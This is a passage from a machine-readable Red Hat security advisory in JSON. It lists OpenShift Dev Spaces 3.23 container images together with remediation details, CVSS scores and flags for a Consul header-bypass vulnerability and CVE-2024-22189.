          "category": "external",
          "summary": "https://discuss.hashicorp.com/t/hcsec-2024-23-consul-l7-intentions-vulnerable-to-headers-bypass",
          "url": "https://discuss.hashicorp.com/t/hcsec-2024-23-consul-l7-intentions-vulnerable-to-headers-bypass"
        }
      ],
      "release_date": "2024-10-30T21:20:37.011000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2025-09-15T16:27:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant to your system have been applied. For details on how to apply this update, refer to: https://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2025:15847"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 8.3,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "hashicorp/consul: consul: Consul L7 Intentions Vulnerable To Headers Bypass"
    },
    {
      "cve": "CVE-2024-22189",
      "cwe": {
        "id": "CWE-770",
        "name": "Allocation of Resources Without Limits or Throttling"
      },
      "discovery_date": "2024-04-04T00:00:00+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
